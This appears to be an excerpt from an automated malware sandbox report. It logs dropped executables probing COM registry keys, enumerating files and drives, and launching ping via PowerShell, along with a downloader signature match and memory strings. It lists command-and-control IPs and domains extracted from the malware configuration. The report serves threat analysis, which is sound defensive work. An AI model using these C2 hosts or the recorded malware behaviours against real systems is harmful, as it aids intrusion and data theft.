Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B57978 FindFirstFileW,FindFirstFileW,free,

12_2_00B57978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 12_2_00B5881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

12_2_00B5881C

Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: drive-connect.cyou
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Yara detected Generic Downloader

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0066E0C0 recv,recv,recv,recv,

0_2_0066E0C0

Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com" equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com"}},"current_locale":"en","default_local,~ equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com1 equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com4 equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000028.00000003.269593045061.0000025635606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com8 equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com9 equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comA: equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com\: equals www.youtube.com (Youtube)
Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE955000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.coma equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comdos Unidos equals www.youtube.com (Youtube)
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666926038.000001B3EE8D9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comins.js equals www.youtube.com (Youtube)
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.comlhkhi equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commgoekp# equals www.youtube.com (Youtube)
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commhnfd equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commhnfdidos equals www.youtube.com (Youtube)
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.commieda equals www.youtube.com (Youtube)
Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F5000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594381110.00000256355F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tent":{"enabled":true,"origin":"http://www.youtube.com"}},"curfJgn_ equals www.youtube.com (Youtube)
Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tent":{"enabled":true,"origin":"http://www.youtube.com"}},"curnf equals www.youtube.com (Youtube)
Source: b1dc05533c.exe, 00000014.00000003.269571692117.00000000039C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)

Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering
Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869628634.00000178EACFA000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269862182845.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269870901531.00000178EA413000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857780538.00000178EAD32000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868181305.00000178EADF1000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269867565150.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852023135.00000178EAD20000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269854443066.00000178EA405000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868015957.00000178EAEA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.cHC
Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666538652.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx$ov
Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx0
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF0C000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622740092.00000247ADF21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx2
Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx5
Source: dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx9
Source: t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666538652.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667253745.000001B3EE926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx?
Source: dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crxA
Source: dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crxX
Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crxs
